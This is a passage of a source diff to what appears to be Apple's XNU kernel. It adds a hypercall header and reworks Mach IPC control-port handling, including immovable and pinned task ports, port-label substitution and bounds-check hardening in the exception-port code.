+ * + * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ + */ + +#ifndef _KERN_HVG_HYPERCALL_H_ +#define _KERN_HVG_HYPERCALL_H_ + +#include +#include + +/* Architecture-independent definitions (exported to userland) */ + +/* + * Apple Hypercall arguments + */ +typedef struct hvg_hcall_args { + uint64_t args[6]; +} hvg_hcall_args_t; + + +/* + * Apple Hypercall return output + */ +typedef struct hvg_hcall_output { + uint64_t regs[7]; +} hvg_hcall_output_t; + + +/* + * Apple Hypercall return code + */ + +OS_CLOSED_ENUM(hvg_hcall_return, uint32_t, + HVG_HCALL_SUCCESS = 0x0000, /* The call succeeded */ + HVG_HCALL_ACCESS_DENIED = 0x0001, /* Invalid access right */ + HVG_HCALL_INVALID_CODE = 0x0002, /* Hypercall code not recognized */ + HVG_HCALL_INVALID_PARAMETER = 0x0003, /* Specified register value not valid */ + HVG_HCALL_IO_FAILED = 0x0004, /* Input/output error */ + HVG_HCALL_FEAT_DISABLED = 0x0005, /* Feature not available */ + HVG_HCALL_UNSUPPORTED = 0x0006, /* Hypercall not supported */ + ); + + +/* + * Apple Hypercall call code + */ + +OS_CLOSED_ENUM(hvg_hcall_code, uint32_t, + HVG_HCALL_TRIGGER_DUMP = 0x0001, /* Collect guest dump */ + ); + +/* + * Options for collecting kernel vmcore + */ + +OS_CLOSED_OPTIONS(hvg_hcall_dump_option, uint32_t, + HVG_HCALL_DUMP_OPTION_REGULAR = 0x0001 /* Regular dump-guest-memory */ + ); + +typedef struct hvg_hcall_vmcore_file { + char tag[57]; /* 7 64-bit registers plus 1 byte for '\0' */ +} hvg_hcall_vmcore_file_t; + +extern hvg_hcall_return_t +hvg_hcall_trigger_dump(hvg_hcall_vmcore_file_t *vmcore, + const hvg_hcall_dump_option_t dump_option); + + +#ifdef XNU_KERNEL_PRIVATE + +/* + * For XNU kernel use only (omitted from userland headers) + */ + +#if defined (__x86_64__) +#include +#include +#endif + +#endif /* XNU_KERNEL_PRIVATE */ + +#endif /* _KERN_HVG_HYPERCALL_H_ */ diff --git a/osfmk/kern/ipc_host.c b/osfmk/kern/ipc_host.c index 427bcee12..33612c5f9 100644 --- a/osfmk/kern/ipc_host.c +++ b/osfmk/kern/ipc_host.c @@ -302,11 +302,17 
@@ convert_port_to_host_priv( { host_t host = HOST_NULL; + /* reject translation if itk_host is not host_priv */ + if (port != current_task()->itk_host) { + return HOST_NULL; + } + if (IP_VALID(port)) { ip_lock(port); if (ip_active(port) && (ip_kotype(port) == IKOT_HOST_PRIV)) { - host = (host_t) ip_get_kobject(port); + assert(ip_get_kobject(port) == &realhost); + host = &realhost; } ip_unlock(port); } @@ -602,8 +608,6 @@ host_set_exception_ports( } #endif - assert(host_priv == &realhost); - host_lock(host_priv); for (i = FIRST_EXCEPTION; i < EXC_TYPES_COUNT; i++) { @@ -696,8 +700,6 @@ host_get_exception_ports( return KERN_INVALID_ARGUMENT; } - assert(host_priv == &realhost); - host_lock(host_priv); count = 0; @@ -716,16 +718,13 @@ host_get_exception_ports( break; } }/* for */ - if (j == count) { + if (j == count && count < *CountCnt) { masks[j] = (1 << i); ports[j] = ipc_port_copy_send(host_priv->exc_actions[i].port); behaviors[j] = host_priv->exc_actions[i].behavior; flavors[j] = host_priv->exc_actions[i].flavor; count++; - if (count > *CountCnt) { - break; - } } } }/* for */ diff --git a/osfmk/kern/ipc_kobject.c b/osfmk/kern/ipc_kobject.c index 9a3e468b2..dc196835a 100644 --- a/osfmk/kern/ipc_kobject.c +++ b/osfmk/kern/ipc_kobject.c @@ -110,7 +110,9 @@ #include #include +#if CONFIG_USER_NOTIFICATION #include +#endif #if CONFIG_ARCADE #include @@ -127,6 +129,7 @@ #include #endif /* XK_PROXY */ +#include #include #include #include @@ -143,9 +146,9 @@ #include #include #include -#include #include #include +#include #if HYPERVISOR #include @@ -174,9 +177,6 @@ typedef struct { mig_routine_t routine; int size; int kobjidx; -#if MACH_COUNTERS - mach_counter_t callcount; -#endif } mig_hash_t; #define MAX_MIG_ENTRIES 1031 @@ -213,7 +213,9 @@ static const struct mig_subsystem *mig_e[] = { #ifdef VM32_SUPPORT (const struct mig_subsystem *)&vm32_map_subsystem, #endif +#if CONFIG_USER_NOTIFICATION (const struct mig_subsystem *)&UNDReply_subsystem, +#endif (const struct 
mig_subsystem *)&mach_voucher_subsystem, (const struct mig_subsystem *)&mach_voucher_attr_control_subsystem, (const struct mig_subsystem *)&memory_entry_subsystem, @@ -301,10 +303,6 @@ find_mig_hash_entry(int msgh_id) if (!ptr->routine || msgh_id != ptr->num) { ptr = (mig_hash_t *)0; - } else { -#if MACH_COUNTERS - ptr->callcount++; -#endif } return ptr; @@ -724,6 +722,9 @@ ipc_kobject_init_port( if (options & IPC_KOBJECT_ALLOC_IMMOVABLE_SEND) { port->ip_immovable_send = 1; } + if (options & IPC_KOBJECT_ALLOC_PINNED) { + port->ip_pinned = 1; + } } /* @@ -791,6 +792,42 @@ ipc_kobject_alloc_labeled_port( return port; } +static void +ipc_kobject_subst_once_notify(mach_msg_header_t *msg) +{ + mach_no_senders_notification_t *notification = (void *)msg; + ipc_port_t port = notification->not_header.msgh_remote_port; + + require_ip_active(port); + assert(IKOT_PORT_SUBST_ONCE == ip_kotype(port)); + + ip_release((ipc_port_t)ip_get_kobject(port)); + ipc_port_dealloc_kernel(port); +} + +/* + * Routine: ipc_kobject_alloc_subst_once + * Purpose: + * Make a port that will be substituted by the kolabel + * rules once, preventing the next substitution (of its target) + * to happen if any. + * + * Returns: + * A port with a send right, that will substitute to its "kobject". 
+ * + * Conditions: + * No locks held (memory is allocated) + * `target` has a refcount that this function consumes + */ +ipc_port_t +ipc_kobject_alloc_subst_once( + ipc_port_t target) +{ + return ipc_kobject_alloc_labeled_port(target, + IKOT_PORT_SUBST_ONCE, IPC_LABEL_SUBST_ONCE, + IPC_KOBJECT_ALLOC_MAKE_SEND | IPC_KOBJECT_ALLOC_NSREQUEST); +} + /* * Routine: ipc_kobject_make_send_lazy_alloc_port * Purpose: @@ -820,6 +857,7 @@ ipc_kobject_make_send_lazy_alloc_port( ipc_port_t *port_store, ipc_kobject_t kobject, ipc_kobject_type_t type, + ipc_kobject_alloc_options_t alloc_opts, boolean_t __ptrauth_only should_ptrauth, uint64_t __ptrauth_only ptrauth_discriminator) { @@ -839,7 +877,7 @@ ipc_kobject_make_send_lazy_alloc_port( if (!IP_VALID(port)) { port = ipc_kobject_alloc_port(kobject, type, - IPC_KOBJECT_ALLOC_MAKE_SEND | IPC_KOBJECT_ALLOC_NSREQUEST); + IPC_KOBJECT_ALLOC_MAKE_SEND | IPC_KOBJECT_ALLOC_NSREQUEST | alloc_opts); #if __has_feature(ptrauth_calls) if (should_ptrauth) { @@ -1009,40 +1047,150 @@ ipc_kobject_destroy( } /* - * Routine: ipc_kobject_label_check + * Routine: ipc_kobject_label_substitute_task + * Purpose: + * Substitute a task control port for its immovable + * equivalent when the receiver is that task. + * Conditions: + * Space is write locked and active. + * Port is locked and active. + * Returns: + * - IP_NULL port if no substitution is to be done + * - a valid port if a substitution needs to happen + */ +static ipc_port_t +ipc_kobject_label_substitute_task( + ipc_space_t space, + ipc_port_t port) +{ + ipc_port_t subst = IP_NULL; + task_t task = ipc_kobject_get(port); + + if (task != TASK_NULL && task == space->is_task) { + if ((subst = port->ip_alt_port)) { + return subst; + } + } + + return IP_NULL; +} + +/* + * Routine: ipc_kobject_label_substitute_thread + * Purpose: + * Substitute a thread control port for its immovable + * equivalent when it belongs to the receiver task. + * Conditions: + * Space is write locked and active. 
+ * Port is locked and active. + * Returns: + * - IP_NULL port if no substitution is to be done + * - a valid port if a substitution needs to happen + */ +static ipc_port_t +ipc_kobject_label_substitute_thread( + ipc_space_t space, + ipc_port_t port) +{ + ipc_port_t subst = IP_NULL; + thread_t thread = ipc_kobject_get(port); + + if (thread != THREAD_NULL && space->is_task == thread->task) { + if ((subst = port->ip_alt_port) != IP_NULL) { + return subst; + } + } + + return IP_NULL; +} + +/* + * Routine: ipc_kobject_label_check * Purpose: - * Check to see if the space is allowed to possess a - * right for the given port. In order to qualify, the - * space label must contain all the privileges listed - * in the port/kobject label. + * Check to see if the space is allowed to possess + * a right for the given port. In order to qualify, + * the space label must contain all the privileges + * listed in the port/kobject label. * * Conditions: * Space is write locked and active. - * Port is locked and active. + * Port is locked and active. + * + * Returns: + * Whether the copyout is authorized. + * + * If a port substitution is requested, the space is unlocked, + * the port is unlocked and its "right" consumed. + * + * As of now, substituted ports only happen for send rights. 
*/ -boolean_t +bool ipc_kobject_label_check( - ipc_space_t space, - ipc_port_t port, - __unused mach_msg_type_name_t msgt_name) + ipc_space_t space, + ipc_port_t port, + mach_msg_type_name_t msgt_name, + ipc_object_copyout_flags_t *flags, + ipc_port_t *subst_portp) { ipc_kobject_label_t labelp; + ipc_label_t label; assert(is_active(space)); assert(ip_active(port)); + *subst_portp = IP_NULL; + /* Unlabled ports/kobjects are always allowed */ if (!ip_is_kolabeled(port)) { - return TRUE; + return true; } /* Never OK to copyout the receive right for a labeled kobject */ if (msgt_name == MACH_MSG_TYPE_PORT_RECEIVE) { - panic("ipc_kobject_label_check: attempted receive right copyout for labeled kobject"); + panic("ipc_kobject_label_check: attempted receive right " + "copyout for labeled kobject"); } labelp = port->ip_kolabel; - return (labelp->ikol_label & space->is_label) == labelp->ikol_label; + label = labelp->ikol_label; + + if ((*flags & IPC_OBJECT_COPYOUT_FLAGS_NO_LABEL_CHECK) == 0 && + (label & IPC_LABEL_SUBST_MASK)) { + ipc_port_t subst = IP_NULL; + + if (msgt_name != MACH_MSG_TYPE_PORT_SEND) { + return false; + } + + switch (label & IPC_LABEL_SUBST_MASK) { + case IPC_LABEL_SUBST_TASK: + subst = ipc_kobject_label_substitute_task(space, port); + break; + case IPC_LABEL_SUBST_THREAD: + subst = ipc_kobject_label_substitute_thread(space, port); + break; + case IPC_LABEL_SUBST_ONCE: + /* the next check will _not_ substitute */ + *flags |= IPC_OBJECT_COPYOUT_FLAGS_NO_LABEL_CHECK; + subst = ip_get_kobject(port); + break; + default: + panic("unexpected label: %llx\n", label); + } + + if (subst != IP_NULL) { + ip_reference(subst); + is_write_unlock(space); + ipc_port_release_send_and_unlock(port); + port = ipc_port_make_send(subst); + ip_release(subst); + *subst_portp = port; + return true; + } + } + + return (label & space->is_label & IPC_LABEL_SPACE_MASK) == + (label & IPC_LABEL_SPACE_MASK); } boolean_t @@ -1083,6 +1231,10 @@ ipc_kobject_notify( 
ipc_voucher_attr_control_notify(request_header); return TRUE; + case IKOT_PORT_SUBST_ONCE: + ipc_kobject_subst_once_notify(request_header); + return TRUE; + case IKOT_SEMAPHORE: semaphore_notify(request_header); return TRUE; @@ -1139,6 +1291,9 @@ ipc_kobject_notify( case IKOT_SUID_CRED: suid_cred_notify(request_header); return TRUE; + case IKOT_TASK_ID_TOKEN: + task_id_token_notify(request_header); + return TRUE; #if HYPERVISOR case IKOT_HYPERVISOR: hv_port_notify(request_header); diff --git a/osfmk/kern/ipc_kobject.h b/osfmk/kern/ipc_kobject.h index 02614a531..62c55cc9a 100644 --- a/osfmk/kern/ipc_kobject.h +++ b/osfmk/kern/ipc_kobject.h @@ -98,7 +98,7 @@ typedef natural_t ipc_kobject_type_t; #define IKOT_PSET 6 #define IKOT_PSET_NAME 7 #define IKOT_TIMER 8 -#define IKOT_PAGING_REQUEST 9 +#define IKOT_PORT_SUBST_ONCE 9 #define IKOT_MIG 10 #define IKOT_MEMORY_OBJECT 11 #define IKOT_XMM_PAGER 12 @@ -139,12 +139,13 @@ typedef natural_t ipc_kobject_type_t; #define IKOT_THREAD_READ 47 #define IKOT_SUID_CRED 48 #define IKOT_HYPERVISOR 49 +#define IKOT_TASK_ID_TOKEN 50 /* * Add new entries here and adjust IKOT_UNKNOWN. * Please keep ipc/ipc_object.c:ikot_print_array up to date. 
*/ -#define IKOT_UNKNOWN 50 /* magic catchall */ +#define IKOT_UNKNOWN 51 /* magic catchall */ #define IKOT_MAX_TYPE (IKOT_UNKNOWN+1) /* # of IKOT_ types */ /* set the bitstring index for kobject */ @@ -191,6 +192,8 @@ __options_decl(ipc_kobject_alloc_options_t, uint32_t, { IPC_KOBJECT_ALLOC_IMMOVABLE_SEND = 0x00000008, /* Add a label structure to the port */ IPC_KOBJECT_ALLOC_LABEL = 0x00000010, + /* Make all rights pinned (non dealloc-able) in an ipc space*/ + IPC_KOBJECT_ALLOC_PINNED = 0x00000020, }); /* Allocates a kobject port, never fails */ @@ -206,11 +209,15 @@ extern ipc_port_t ipc_kobject_alloc_labeled_port( ipc_label_t label, ipc_kobject_alloc_options_t options); +extern ipc_port_t ipc_kobject_alloc_subst_once( + ipc_port_t target); + /* Makes a send right, lazily allocating a kobject port, arming for no-senders, never fails */ extern boolean_t ipc_kobject_make_send_lazy_alloc_port( ipc_port_t *port_store, ipc_kobject_t kobject, ipc_kobject_type_t type, + ipc_kobject_alloc_options_t alloc_opts, boolean_t should_ptrauth, uint64_t ptrauth_discriminator) __result_use_check; @@ -235,10 +242,28 @@ ipc_kobject_get(ipc_port_t port) } /* Check if a kobject can be copied out to a given space */ -extern boolean_t ipc_kobject_label_check( - ipc_space_t space, - ipc_port_t port, - mach_msg_type_name_t msgt_name); +extern bool ipc_kobject_label_check( + ipc_space_t space, + ipc_port_t port, + mach_msg_type_name_t msgt_name, + ipc_object_copyout_flags_t *flags, + ipc_port_t *subst_portp) __result_use_check; + +__result_use_check +static inline bool +ip_label_check( + ipc_space_t space, + ipc_port_t port, + mach_msg_type_name_t msgt_name, + ipc_object_copyout_flags_t *flags, + ipc_port_t *subst_portp) +{ + if (!ip_is_kolabeled(port)) { + *subst_portp = IP_NULL; + return true; + } + return ipc_kobject_label_check(space, port, msgt_name, flags, subst_portp); +} /* Release any kernel object resources associated with a port */ extern void ipc_kobject_destroy( @@ -249,6 
+274,21 @@ extern void ipc_kobject_destroy( extern kern_return_t uext_server(ipc_kmsg_t request, ipc_kmsg_t * reply); +/* These boot-args decide if the pinned and immovable ports can be copied out to IPC space */ +__options_decl(ipc_control_port_options_t, uint32_t, { + IPC_CONTROL_PORT_OPTIONS_NONE = 0x00, + + IPC_CONTROL_PORT_OPTIONS_PINNED_SOFT = 0x01, + IPC_CONTROL_PORT_OPTIONS_PINNED_HARD = 0x02, + + IPC_CONTROL_PORT_OPTIONS_IMMOVABLE_SOFT = 0x10, + IPC_CONTROL_PORT_OPTIONS_IMMOVABLE_HARD = 0x20, +}); + +extern ipc_control_port_options_t ipc_control_port_options; +extern bool pinned_control_port_enabled; +extern bool immovable_control_port_enabled; + #endif /* MACH_KERNEL_PRIVATE */ #endif /* KERNEL_PRIVATE */ diff --git a/osfmk/kern/ipc_mig.c b/osfmk/kern/ipc_mig.c index d47764b90..c1c99b932 100644 --- a/osfmk/kern/ipc_mig.c +++ b/osfmk/kern/ipc_mig.c @@ -347,7 +347,7 @@ mach_msg_rpc_from_kernel( mach_msg_size_t send_size, mach_msg_size_t rcv_size) { - return kernel_mach_msg_rpc(msg, send_size, rcv_size, TRUE, NULL); + return kernel_mach_msg_rpc(msg, send_size, rcv_size, TRUE, TRUE, NULL); } #endif /* IKM_SUPPORT_LEGACY */ @@ -357,7 +357,7 @@ mach_msg_rpc_from_kernel_proper( mach_msg_size_t send_size, mach_msg_size_t rcv_size) { - return kernel_mach_msg_rpc(msg, send_size, rcv_size, FALSE, NULL); + return kernel_mach_msg_rpc(msg, send_size, rcv_size, FALSE, TRUE, NULL); } mach_msg_return_t @@ -369,6 +369,7 @@ kernel_mach_msg_rpc( __unused #endif boolean_t legacy, + boolean_t interruptible, boolean_t *message_moved) { thread_t self = current_thread(); @@ -449,7 +450,7 @@ kernel_mach_msg_rpc( require_ip_active(reply); /* JMM - why this check? 
*/ - if (!self->active && !self->inspection) { + if (interruptible && !self->active && !self->inspection) { ipc_port_dealloc_reply(reply); self->ith_rpc_reply = IP_NULL; return MACH_RCV_INTERRUPTED; @@ -462,7 +463,7 @@ kernel_mach_msg_rpc( MACH_MSG_OPTION_NONE, MACH_MSG_SIZE_MAX, MACH_MSG_TIMEOUT_NONE, - THREAD_INTERRUPTIBLE); + interruptible ? THREAD_INTERRUPTIBLE : THREAD_UNINT); mr = self->ith_state; kmsg = self->ith_kmsg; @@ -475,7 +476,7 @@ kernel_mach_msg_rpc( } assert(mr == MACH_RCV_INTERRUPTED); - + assert(interruptible); assert(reply == self->ith_rpc_reply); if (self->ast & AST_APC) { @@ -1036,7 +1037,7 @@ convert_mig_object_to_port( * if this is the first send right */ if (!ipc_kobject_make_send_lazy_alloc_port(&mig_object->port, - (ipc_kobject_t) mig_object, IKOT_MIG, false, 0)) { + (ipc_kobject_t) mig_object, IKOT_MIG, IPC_KOBJECT_ALLOC_NONE, false, 0)) { mig_object_deallocate(mig_object); } diff --git a/osfmk/kern/ipc_mig.h b/osfmk/kern/ipc_mig.h index 48abc2591..cbb2f2aa3 100644 --- a/osfmk/kern/ipc_mig.h +++ b/osfmk/kern/ipc_mig.h @@ -161,6 +161,7 @@ mach_msg_return_t kernel_mach_msg_rpc( mach_msg_size_t send_size, mach_msg_size_t rcv_size, boolean_t legacy, + boolean_t interruptible, boolean_t *message_moved); #endif /* XNU_KERNEL_PRIVATE */ diff --git a/osfmk/kern/ipc_misc.c b/osfmk/kern/ipc_misc.c index aaec28a5d..6e7638f5e 100644 --- a/osfmk/kern/ipc_misc.c +++ b/osfmk/kern/ipc_misc.c @@ -156,7 +156,7 @@ fileport_invoke(task_t task, mach_port_name_t name, kr = ipc_object_copyin(task->itk_space, name, MACH_MSG_TYPE_COPY_SEND, (ipc_object_t *)&fileport, 0, NULL, - IPC_KMSG_FLAGS_ALLOW_IMMOVABLE_SEND); + IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND); if (kr != KERN_SUCCESS) { return kr; } diff --git a/osfmk/kern/ipc_sync.c b/osfmk/kern/ipc_sync.c index 643c38fbb..34bff5606 100644 --- a/osfmk/kern/ipc_sync.c +++ b/osfmk/kern/ipc_sync.c @@ -140,7 +140,7 @@ convert_semaphore_to_port(semaphore_t semaphore) * semaphore_notify if this is the first send 
right */ if (!ipc_kobject_make_send_lazy_alloc_port(&semaphore->port, - (ipc_kobject_t) semaphore, IKOT_SEMAPHORE, false, 0)) { + (ipc_kobject_t) semaphore, IKOT_SEMAPHORE, IPC_KOBJECT_ALLOC_NONE, false, 0)) { semaphore_dereference(semaphore); } return semaphore->port; diff --git a/osfmk/kern/ipc_tt.c b/osfmk/kern/ipc_tt.c index 7a7d3b783..f02ed471a 100644 --- a/osfmk/kern/ipc_tt.c +++ b/osfmk/kern/ipc_tt.c @@ -91,6 +91,7 @@ #include #include #include +#include #include #include @@ -109,21 +110,18 @@ extern int cs_relax_platform_task_ports; extern boolean_t IOTaskHasEntitlement(task_t, const char *); /* forward declarations */ -task_t convert_port_to_locked_task(ipc_port_t port, boolean_t eval); -task_inspect_t convert_port_to_locked_task_inspect(ipc_port_t port); -task_read_t convert_port_to_locked_task_read(ipc_port_t port); -static task_read_t convert_port_to_task_read_locked(ipc_port_t port); static kern_return_t port_allowed_with_task_flavor(int which, mach_task_flavor_t flavor); static kern_return_t port_allowed_with_thread_flavor(int which, mach_thread_flavor_t flavor); -static task_inspect_t convert_port_to_task_inspect_locked(ipc_port_t port); static void ipc_port_bind_special_reply_port_locked(ipc_port_t port); static kern_return_t ipc_port_unbind_special_reply_port(thread_t thread, boolean_t unbind_active_port); kern_return_t task_conversion_eval(task_t caller, task_t victim); static ipc_space_t convert_port_to_space_no_eval(ipc_port_t port); -static task_t convert_port_to_task_no_eval(ipc_port_t port); static thread_t convert_port_to_thread_no_eval(ipc_port_t port); static ipc_port_t convert_task_to_port_with_flavor(task_t task, mach_task_flavor_t flavor); static ipc_port_t convert_thread_to_port_with_flavor(thread_t thread, mach_thread_flavor_t flavor); +static task_read_t convert_port_to_task_read_no_eval(ipc_port_t port); +static thread_read_t convert_port_to_thread_read_no_eval(ipc_port_t port); +static ipc_space_read_t 
convert_port_to_space_read_no_eval(ipc_port_t port); /* * Routine: ipc_task_init @@ -144,7 +142,7 @@ ipc_task_init( ipc_space_t space; ipc_port_t kport; ipc_port_t nport; - + ipc_port_t pport; kern_return_t kr; int i; @@ -156,10 +154,21 @@ ipc_task_init( space->is_task = task; - kport = ipc_port_alloc_kernel(); + if (immovable_control_port_enabled) { + ipc_kobject_alloc_options_t options = IPC_KOBJECT_ALLOC_IMMOVABLE_SEND; + if (pinned_control_port_enabled) { + options |= IPC_KOBJECT_ALLOC_PINNED; + } + pport = ipc_kobject_alloc_port(IKO_NULL, IKOT_NONE, options); - if (kport == IP_NULL) { - panic("ipc_task_init"); + kport = ipc_kobject_alloc_labeled_port(IKO_NULL, IKOT_TASK_CONTROL, + IPC_LABEL_SUBST_TASK, IPC_KOBJECT_ALLOC_NONE); + kport->ip_alt_port = pport; + } else { + kport = ipc_kobject_alloc_port(IKO_NULL, IKOT_TASK_CONTROL, + IPC_KOBJECT_ALLOC_NONE); + + pport = kport; } nport = ipc_port_alloc_kernel(); @@ -167,15 +176,21 @@ ipc_task_init( panic("ipc_task_init"); } + if (pport == IP_NULL) { + panic("ipc_task_init"); + } + itk_lock_init(task); - task->itk_self[TASK_FLAVOR_CONTROL] = kport; - task->itk_self[TASK_FLAVOR_NAME] = nport; + task->itk_task_ports[TASK_FLAVOR_CONTROL] = kport; + task->itk_task_ports[TASK_FLAVOR_NAME] = nport; /* Lazily allocated on-demand */ - task->itk_self[TASK_FLAVOR_INSPECT] = IP_NULL; - task->itk_self[TASK_FLAVOR_READ] = IP_NULL; - task->itk_resume = IP_NULL; + task->itk_task_ports[TASK_FLAVOR_INSPECT] = IP_NULL; + task->itk_task_ports[TASK_FLAVOR_READ] = IP_NULL; + task->itk_dyld_notify = NULL; + task->itk_self = pport; + task->itk_resume = IP_NULL; /* Lazily allocated on-demand */ if (task_is_a_corpse_fork(task)) { /* * No sender's notification for corpse would not @@ -221,7 +236,7 @@ ipc_task_init( } } else { itk_lock(parent); - assert(parent->itk_self[TASK_FLAVOR_CONTROL] != IP_NULL); + assert(parent->itk_task_ports[TASK_FLAVOR_CONTROL] != IP_NULL); /* inherit registered ports */ @@ -280,24 +295,33 @@ ipc_task_enable( 
ipc_port_t nport; ipc_port_t iport; ipc_port_t rdport; + ipc_port_t pport; itk_lock(task); - kport = task->itk_self[TASK_FLAVOR_CONTROL]; + + assert(!task->ipc_active || task_is_a_corpse(task)); + task->ipc_active = true; + + kport = task->itk_task_ports[TASK_FLAVOR_CONTROL]; if (kport != IP_NULL) { ipc_kobject_set(kport, (ipc_kobject_t) task, IKOT_TASK_CONTROL); } - nport = task->itk_self[TASK_FLAVOR_NAME]; + nport = task->itk_task_ports[TASK_FLAVOR_NAME]; if (nport != IP_NULL) { ipc_kobject_set(nport, (ipc_kobject_t) task, IKOT_TASK_NAME); } - iport = task->itk_self[TASK_FLAVOR_INSPECT]; + iport = task->itk_task_ports[TASK_FLAVOR_INSPECT]; if (iport != IP_NULL) { ipc_kobject_set(iport, (ipc_kobject_t) task, IKOT_TASK_INSPECT); } - rdport = task->itk_self[TASK_FLAVOR_READ]; + rdport = task->itk_task_ports[TASK_FLAVOR_READ]; if (rdport != IP_NULL) { ipc_kobject_set(rdport, (ipc_kobject_t) task, IKOT_TASK_READ); } + pport = task->itk_self; + if (immovable_control_port_enabled && pport != IP_NULL) { + ipc_kobject_set(pport, (ipc_kobject_t) task, IKOT_TASK_CONTROL); + } itk_unlock(task); } @@ -319,24 +343,45 @@ ipc_task_disable( ipc_port_t iport; ipc_port_t rdport; ipc_port_t rport; + ipc_port_t pport; itk_lock(task); - kport = task->itk_self[TASK_FLAVOR_CONTROL]; + + /* + * This innocuous looking line is load bearing. + * + * It is used to disable the creation of lazy made ports. + * We must do so before we drop the last reference on the task, + * as task ports do not own a reference on the task, and + * convert_port_to_task* will crash trying to resurrect a task. 
+ */ + task->ipc_active = false; + + kport = task->itk_task_ports[TASK_FLAVOR_CONTROL]; if (kport != IP_NULL) { - ipc_kobject_set(kport, IKO_NULL, IKOT_NONE); + ip_lock(kport); + kport->ip_alt_port = IP_NULL; + ipc_kobject_set_atomically(kport, IKO_NULL, IKOT_NONE); + ip_unlock(kport); } - nport = task->itk_self[TASK_FLAVOR_NAME]; + nport = task->itk_task_ports[TASK_FLAVOR_NAME]; if (nport != IP_NULL) { ipc_kobject_set(nport, IKO_NULL, IKOT_NONE); } - iport = task->itk_self[TASK_FLAVOR_INSPECT]; + iport = task->itk_task_ports[TASK_FLAVOR_INSPECT]; if (iport != IP_NULL) { ipc_kobject_set(iport, IKO_NULL, IKOT_NONE); } - rdport = task->itk_self[TASK_FLAVOR_READ]; + rdport = task->itk_task_ports[TASK_FLAVOR_READ]; if (rdport != IP_NULL) { ipc_kobject_set(rdport, IKO_NULL, IKOT_NONE); } + pport = task->itk_self; + if (pport != kport && pport != IP_NULL) { + assert(immovable_control_port_enabled); + assert(pport->ip_immovable_send); + ipc_kobject_set(pport, IKO_NULL, IKOT_NONE); + } rport = task->itk_resume; if (rport != IP_NULL) { @@ -375,27 +420,51 @@ ipc_task_terminate( ipc_port_t iport; ipc_port_t rdport; ipc_port_t rport; - int i; + ipc_port_t pport; + ipc_port_t sself; + ipc_port_t *notifiers_ptr = NULL; itk_lock(task); - kport = task->itk_self[TASK_FLAVOR_CONTROL]; + + /* + * If we ever failed to clear ipc_active before the last reference + * was dropped, lazy ports might be made and used after the last + * reference is dropped and cause use after free (see comment in + * ipc_task_disable()). + */ + assert(!task->ipc_active); + + kport = task->itk_task_ports[TASK_FLAVOR_CONTROL]; + sself = task->itk_settable_self; if (kport == IP_NULL) { /* the task is already terminated (can this happen?) 
*/ itk_unlock(task); return; } - task->itk_self[TASK_FLAVOR_CONTROL] = IP_NULL; + task->itk_task_ports[TASK_FLAVOR_CONTROL] = IP_NULL; - rdport = task->itk_self[TASK_FLAVOR_READ]; - task->itk_self[TASK_FLAVOR_READ] = IP_NULL; + rdport = task->itk_task_ports[TASK_FLAVOR_READ]; + task->itk_task_ports[TASK_FLAVOR_READ] = IP_NULL; - iport = task->itk_self[TASK_FLAVOR_INSPECT]; - task->itk_self[TASK_FLAVOR_INSPECT] = IP_NULL; + iport = task->itk_task_ports[TASK_FLAVOR_INSPECT]; + task->itk_task_ports[TASK_FLAVOR_INSPECT] = IP_NULL; - nport = task->itk_self[TASK_FLAVOR_NAME]; + nport = task->itk_task_ports[TASK_FLAVOR_NAME]; assert(nport != IP_NULL); - task->itk_self[TASK_FLAVOR_NAME] = IP_NULL; + task->itk_task_ports[TASK_FLAVOR_NAME] = IP_NULL; + + if (task->itk_dyld_notify) { + notifiers_ptr = task->itk_dyld_notify; + task->itk_dyld_notify = NULL; + } + + if (immovable_control_port_enabled) { + pport = task->itk_self; + assert(pport != IP_NULL); + } + + task->itk_self = IP_NULL; rport = task->itk_resume; task->itk_resume = IP_NULL; @@ -403,12 +472,20 @@ ipc_task_terminate( itk_unlock(task); /* release the naked send rights */ + if (IP_VALID(sself)) { + ipc_port_release_send(sself); + } - if (IP_VALID(task->itk_settable_self)) { - ipc_port_release_send(task->itk_settable_self); + if (notifiers_ptr) { + for (int i = 0; i < DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT; i++) { + if (IP_VALID(notifiers_ptr[i])) { + ipc_port_release_send(notifiers_ptr[i]); + } + } + kfree(notifiers_ptr, DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT * sizeof(ipc_port_t)); } - for (i = FIRST_EXCEPTION; i < EXC_TYPES_COUNT; i++) { + for (int i = FIRST_EXCEPTION; i < EXC_TYPES_COUNT; i++) { if (IP_VALID(task->exc_actions[i].port)) { ipc_port_release_send(task->exc_actions[i].port); } @@ -441,13 +518,22 @@ ipc_task_terminate( ipc_port_release_send(task->itk_debug_control); } - for (i = 0; i < TASK_PORT_REGISTER_MAX; i++) { + for (int i = 0; i < TASK_PORT_REGISTER_MAX; i++) { if (IP_VALID(task->itk_registered[i])) { 
ipc_port_release_send(task->itk_registered[i]); } } /* destroy the kernel ports */ + if (immovable_control_port_enabled) { + ip_lock(kport); + kport->ip_alt_port = IP_NULL; + ipc_kobject_set_atomically(kport, IKO_NULL, IKOT_NONE); + ip_unlock(kport); + + /* pport == kport if immovability is off */ + ipc_port_dealloc_kernel(pport); + } ipc_port_dealloc_kernel(kport); ipc_port_dealloc_kernel(nport); if (iport != IP_NULL) { @@ -479,32 +565,53 @@ void ipc_task_reset( task_t task) { - ipc_port_t old_kport, new_kport; + ipc_port_t old_kport, old_pport, new_kport, new_pport; ipc_port_t old_sself; ipc_port_t old_rdport; ipc_port_t old_iport; ipc_port_t old_exc_actions[EXC_TYPES_COUNT]; - int i; + ipc_port_t *notifiers_ptr = NULL; #if CONFIG_MACF /* Fresh label to unset credentials in existing labels. */ struct label *unset_label = mac_exc_create_label(); #endif - new_kport = ipc_kobject_alloc_port((ipc_kobject_t)task, IKOT_TASK_CONTROL, - IPC_KOBJECT_ALLOC_MAKE_SEND); + if (immovable_control_port_enabled) { + ipc_kobject_alloc_options_t options = IPC_KOBJECT_ALLOC_IMMOVABLE_SEND; + if (pinned_control_port_enabled) { + options |= IPC_KOBJECT_ALLOC_PINNED; + } + + new_pport = ipc_kobject_alloc_port((ipc_kobject_t)task, + IKOT_TASK_CONTROL, options); + + new_kport = ipc_kobject_alloc_labeled_port((ipc_kobject_t)task, + IKOT_TASK_CONTROL, IPC_LABEL_SUBST_TASK, + IPC_KOBJECT_ALLOC_NONE); + new_kport->ip_alt_port = new_pport; + } else { + new_kport = ipc_kobject_alloc_port((ipc_kobject_t)task, + IKOT_TASK_CONTROL, 